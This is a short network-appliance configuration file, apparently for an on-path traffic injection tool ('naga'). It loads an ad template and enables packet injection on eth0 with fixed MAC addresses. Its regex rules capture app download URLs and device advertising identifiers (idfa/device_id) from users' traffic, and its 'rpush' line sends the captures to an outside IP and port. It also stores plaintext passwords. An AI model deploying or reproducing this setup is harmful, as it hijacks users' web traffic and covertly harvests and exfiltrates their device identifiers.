!
! Zebra configuration saved from vty
!   2018-08-10 05:56:47
!
hostname Rose
password rose
enable password rose
log file /root/log/naga.log
telnet port 2607
ad template load ad.template
ad template send single
snet default push
adp dmac set 8c:68:c8:11:3c:2e
adp smac set 00:0c:29:b8:70:aa
adp interval 1
adp switch template  on
adp switch on
adp pkt-content eth
ori url add 2 pre-thinned[0-9]+.thinned\.signed\.dpkg\.ipa rpush appid 
ori url add 3 (idfa|device_id)=[a-zA-Z0-9]{8}-([0-9a-zA-Z]{4}-){3}[a-zA-Z0-9]{12} rpush idfa 
itf tx enable
itf rx enable
interface 0 enable
interface 1 enable
interface work-thread add 4
interface bussiness add eth0
interface bussiness add eth1
interface injection add eth0
rpush add 18.191.243.72 6666
!
line vty
!
